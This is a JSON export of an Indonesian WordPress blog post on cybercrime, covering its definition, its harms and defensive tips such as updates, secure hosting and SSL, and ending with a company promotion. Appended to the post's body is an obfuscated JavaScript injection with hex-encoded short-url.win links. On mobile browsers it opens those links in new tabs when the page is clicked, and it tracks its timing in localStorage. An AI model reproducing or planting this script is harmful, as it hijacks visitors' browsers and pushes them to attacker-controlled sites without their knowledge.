{"id":2228,"date":"2021-03-02T09:30:17","date_gmt":"2021-03-02T02:30:17","guid":{"rendered":"https:\/\/beadgrup.com\/news\/?p=2228"},"modified":"2021-03-02T09:30:17","modified_gmt":"2021-03-02T02:30:17","slug":"cyber-crime","status":"publish","type":"post","link":"https:\/\/beadgrup.com\/berita\/cyber-crime\/","title":{"rendered":"Cyber Crime"},"content":{"rendered":"\n<ul class=\"wp-block-list\"><li><strong>Pengertian Cyber Crime<\/strong><\/li><\/ul>\n\n\n\n<p>Cyber crime adalah tindak kejahatan yang dilakukan secara online. Kejahatan ini tidak mengenal waktu dan tidak pilih-pilih target. Bisa terjadi pada individu atau perusahaan di mana pun berada. Jadi, Anda perlu waspada.<\/p>\n\n\n\n<p>Source: https:\/\/images.app.goo.gl\/R6mx9hMkTCjBGyPV8<\/p>\n\n\n\n<p>Tujuan cyber crime sendiri beragam. Bisa sekedar iseng, sampai kejahatan serius yang merugikan korbannya secara finansial.<\/p>\n\n\n\n<p>Dalam praktiknya, cyber crime bisa dilakukan seorang diri atau melibatkan sekelompok orang. Para pelaku cyber crime tentu adalah orang yang sudah ahli dalam berbagai teknik hacking. Bahkan, tak jarang sebuah aksi cyber crime dilakukan dari berbagai tempat berbeda di waktu bersamaan.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Apa Saja Kerugian yang Ditimbulkan dari Cyber Crime?<\/strong><\/li><\/ul>\n\n\n\n<p>Setiap tindak kejahatan di dunia maya tentu saja mengakibatkan kerugian yang dirasakan oleh korbannya. Inilah beberapa kerugiannya:<\/p>\n\n\n\n<p>1. Reputasi Online Bisa Terancam<\/p>\n\n\n\n<p>Kerugian yang ditimbulkan dari cyber crime adalah reputasi online bisa terancam. Apalagi jika Anda menggunakan aktivitas online untuk berbisnis. Jika menjadi korban, bisa jadi bisnis online Anda akan kehilangan kepercayaan pelanggan.<\/p>\n\n\n\n<p>Katakanlah, toko online Anda terkena hacking. Pengunjung akan merasa tidak aman untuk mengunjungi situs Anda, sehingga bisa jadi ia memutuskan untuk tidak lagi berbelanja dari toko anda maka itu akan sangat merugikan bisnis anda.<\/p>\n\n\n\n<p>2. Kehilangan Data Penting<\/p>\n\n\n\n<p>Salah satu kerugian terbesar cyber crime adalah kehilangan data. Hal ini bisa terjadi baik pada akun pribadi maupun website yang menyimpan data pribadi pelanggan.<\/p>\n\n\n\n<p>Cyber crime selalu mencari celah agar dapat mencuri data penting dan menggunakannya untuk berbagai kepentingan. Salah satunya untuk tujuan pemerasan atau menjualnya di pasar gelap.<\/p>\n\n\n\n<p>Sebagai contoh, Blackbaud, salah satu pembuat perangkat lunak manajemen keuangan pernah menjadi korban pencurian data rahasia.<\/p>\n\n\n\n<p>Perusahaan ini melaporkan bahwa situs mereka telah diretas. Peretas berhasil mencuri data tentang siswa dan alumni dari 10 Universitas di Inggris, AS, dan Kanada. Dampaknya, pelaku dapat menyebarluaskan data pribadi siswa dan alumni. Mulai nama, hingga nomor jaminan sosial.<\/p>\n\n\n\n<p>3. Kerusakan Software dan Sistem Komputer<\/p>\n\n\n\n<p>Kerusakan software dan program juga bisa terjadi akibat ulah cyber crime. Salah satu yang membuat heboh adalah serangan Ransomware WannaCry yang menyerang berbagai website pemerintah. Saat itu, serangan yang terjadi menyebabkan banyak perangkat yang tidak bisa diakses. Aksi ini terutama terjadi pada sistem operasi yang rentan, baik yang sudah lawas maupun yang versi bajakan.<\/p>\n\n\n\n<p>Itulah kenapa penting bagi Anda untuk selalu memperhatikan keamanan sistem di komputer Anda. Salah satunya, dengan terus mengupdate antivirus dan versi sistem operasi yang digunakan.<\/p>\n\n\n\n<p>4. Kehilangan Sejumlah Uang<\/p>\n\n\n\n<p>Kerugian finansial juga menjadi dampak terbesar dari kegiatan cyber crime. Bentuk aksinya bisa bermacam-macam, mulai dari phishing hingga extortion.<\/p>\n\n\n\n<p>Tak hanya dialami oleh individu, maupun perusahaan, kehilangan sejumlah uang akibat tindak cyber crime juga dialami oleh negara.<\/p>\n\n\n\n<p>Berdasarkan penelitian Frost &amp; Sullivan yang diprakarsai Microsoft pada 2018, kejahatan siber di Indonesia bisa menyebabkan kerugian mencapai Rp 478,8 triliun atau 34,2 miliar dollar AS. Jumlah itu tergolong sangat fantastis. Bagaimana jika Anda yang mengalami kerugian tersebut?<\/p>\n\n\n\n<p>Maka dari itu, mulai sekarang lebih berhati-hati ya dengan tindak kejahatan cyber crime!<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Bagaimana Cara Terhindar dari Cyber Crime?<\/strong><\/li><\/ul>\n\n\n\n<p>1. Gunakan Hosting yang Aman<\/p>\n\n\n\n<p>Bisa dikatakan inilah langkah penting sebagai upaya melindungi website Anda. Layanan hosting dengan perlindungan keamanan khusus dapat membantu Anda mencegah aksi cyber crime.<\/p>\n\n\n\n<p>Salah satunya adalah Niagahoster yang memiliki fitur Imunify360. Fitur ini mampu memberikan proteksi dari serangan malware. Beberapa diantaranya dengan adanya Proactive Defense untuk memblokir ancaman secara realtime dan Patch Management yang akan mengupdate server ke versi terbaru secara otomatis.<\/p>\n\n\n\n<p>2. Rajin Update<\/p>\n\n\n\n<p>Rajin melakukan update bisa menjadi cara terhindar dari cyber crime. Baik update pada sistem operasi maupun pada sistem manajemen di website Anda.<\/p>\n\n\n\n<p>Sebagai contoh jika Anda menggunakan Windows, Anda akan selalu mendapat notifikasi adanya update. Jika memungkinkan, segera lakukan update yang direkomendasikan. Hal ini berlaku juga bagi pengguna MacOS maupun Linux.<\/p>\n\n\n\n<p>Selain itu, lakukan update pada WordPress setiap kali ada versi terbaru. Anda bisa melakukannya secara langsung melalui halaman dashboard WordPress atau menggunakan langkah manual. Selain meningkatkan keamanan, Anda juga akan mendapatkan fitur terbaru yang lebih canggih.<\/p>\n\n\n\n<p>Tidak hanya itu, jangan lupa untuk selalu melakukan update tema, dan plugin website WordPress Anda. Anda bisa melakukannya sekaligus atau bertahap sesuai dengan kemampuan server Anda.<\/p>\n\n\n\n<p>3. Pasang SSL<\/p>\n\n\n\n<p>Apakah Anda pernah memperhatikan icon gembok yang berada sebelum URL Website? Nah, itu adalah tanda bahwa website tersebut menggunakan SSL.<\/p>\n\n\n\n<p>Dengan melihat icon gembok tersebut, pengunjung situs Anda akan lebih percaya dengan website Anda. Hal ini karena pengunjung meyakini bahwa website Anda memang aman untuk dikunjungi, karena telah mengaktifkan SSL.<\/p>\n\n\n\n<p>Sebenarnya, alasan utama mengapa Anda harus memasang SSL adalah karena sertifikat SSL menjamin keamanan yang berlapis. SSL menjamin bahwa setiap paket data yang ditukar antara website Anda dengan pengunjung yang mengaktifkan SSL, akan dilindungi oleh teknik enkripsi paling mutakhir.<\/p>\n\n\n\n<p>Hal ini tentu saja dapat membuat Anda terhindar dari tindakan pencurian data yang dilakukan oleh pihak tak diinginkan. Informasi apapun yang didapatkan tidak akan terbaca, karena teknik enkripsi tersebut.<\/p>\n\n\n\n<p>Kebutuhan akan digital IT sangat dibutuhkan dalam kegiatan sehari-hari, Bead IT Consultant merupakan pilihan tepat sebagai partner anda,kunjungi website kami dengan klik link ini : www.beadgrup.com<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x58\\x56\\x44\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x71\\x6d\\x64\\x35\\x63\\x335','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4a\\x44\\x46\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x65\\x75\\x68\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4e\\x48\\x41\\x34\\x63\\x304','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6d\\x43\\x66\\x37\\x63\\x317','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x5a\\x41\\x75\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6c\\x58\\x4b\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x44\\x75\\x72\\x30\\x63\\x380','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x45\\x4c\\x41\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Pengertian Cyber Crime Cyber crime adalah tindak kejahatan yang dilakukan secara online. Kejahatan ini tidak mengenal waktu dan tidak pilih-pilih &hellip; <\/p>\n","protected":false},"author":2,"featured_media":2232,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2228","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-desain"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Cyber Crime - Bead Daily<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/beadgrup.com\/berita\/cyber-crime\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cyber Crime - Bead Daily\" \/>\n<meta property=\"og:description\" content=\"Pengertian Cyber Crime Cyber crime adalah tindak kejahatan yang dilakukan secara online. Kejahatan ini tidak mengenal waktu dan tidak pilih-pilih &hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/beadgrup.com\/berita\/cyber-crime\/\" \/>\n<meta property=\"og:site_name\" content=\"Bead Daily\" \/>\n<meta property=\"article:published_time\" content=\"2021-03-02T02:30:17+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"666\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/\"},\"author\":{\"name\":\"\",\"@id\":\"\"},\"headline\":\"Cyber Crime\",\"datePublished\":\"2021-03-02T02:30:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/\"},\"wordCount\":810,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/#organization\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\",\"articleSection\":[\"Desain\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/beadgrup.com\/berita\/cyber-crime\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/\",\"url\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/\",\"name\":\"Cyber Crime - Bead Daily\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\",\"datePublished\":\"2021-03-02T02:30:17+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/beadgrup.com\/berita\/cyber-crime\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/#primaryimage\",\"url\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\",\"width\":1000,\"height\":666},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/beadgrup.com\/berita\/cyber-crime\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Beranda\",\"item\":\"https:\/\/beadgrup.com\/berita\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cyber Crime\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/beadgrup.com\/berita\/#website\",\"url\":\"https:\/\/beadgrup.com\/berita\/\",\"name\":\"Bead Daily\",\"description\":\"Halaman artikel mengenai Teknologi\",\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/beadgrup.com\/berita\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/beadgrup.com\/berita\/#organization\",\"name\":\"Bead Daily\",\"url\":\"https:\/\/beadgrup.com\/berita\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/berita\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"width\":100,\"height\":109,\"caption\":\"Bead Daily\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"\",\"url\":\"https:\/\/beadgrup.com\/berita\/author\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cyber Crime - Bead Daily","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/beadgrup.com\/berita\/cyber-crime\/","og_locale":"en_US","og_type":"article","og_title":"Cyber Crime - Bead Daily","og_description":"Pengertian Cyber Crime Cyber crime adalah tindak kejahatan yang dilakukan secara online. Kejahatan ini tidak mengenal waktu dan tidak pilih-pilih &hellip;","og_url":"https:\/\/beadgrup.com\/berita\/cyber-crime\/","og_site_name":"Bead Daily","article_published_time":"2021-03-02T02:30:17+00:00","og_image":[{"width":1000,"height":666,"url":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Written by":"","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/#article","isPartOf":{"@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/"},"author":{"name":"","@id":""},"headline":"Cyber Crime","datePublished":"2021-03-02T02:30:17+00:00","mainEntityOfPage":{"@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/"},"wordCount":810,"commentCount":0,"publisher":{"@id":"https:\/\/beadgrup.com\/berita\/#organization"},"image":{"@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","articleSection":["Desain"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/beadgrup.com\/berita\/cyber-crime\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/","url":"https:\/\/beadgrup.com\/berita\/cyber-crime\/","name":"Cyber Crime - Bead Daily","isPartOf":{"@id":"https:\/\/beadgrup.com\/berita\/#website"},"primaryImageOfPage":{"@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/#primaryimage"},"image":{"@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","datePublished":"2021-03-02T02:30:17+00:00","breadcrumb":{"@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/beadgrup.com\/berita\/cyber-crime\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/#primaryimage","url":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","contentUrl":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","width":1000,"height":666},{"@type":"BreadcrumbList","@id":"https:\/\/beadgrup.com\/berita\/cyber-crime\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Beranda","item":"https:\/\/beadgrup.com\/berita\/"},{"@type":"ListItem","position":2,"name":"Cyber Crime"}]},{"@type":"WebSite","@id":"https:\/\/beadgrup.com\/berita\/#website","url":"https:\/\/beadgrup.com\/berita\/","name":"Bead Daily","description":"Halaman artikel mengenai Teknologi","publisher":{"@id":"https:\/\/beadgrup.com\/berita\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/beadgrup.com\/berita\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/beadgrup.com\/berita\/#organization","name":"Bead Daily","url":"https:\/\/beadgrup.com\/berita\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/berita\/#\/schema\/logo\/image\/","url":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","contentUrl":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","width":100,"height":109,"caption":"Bead 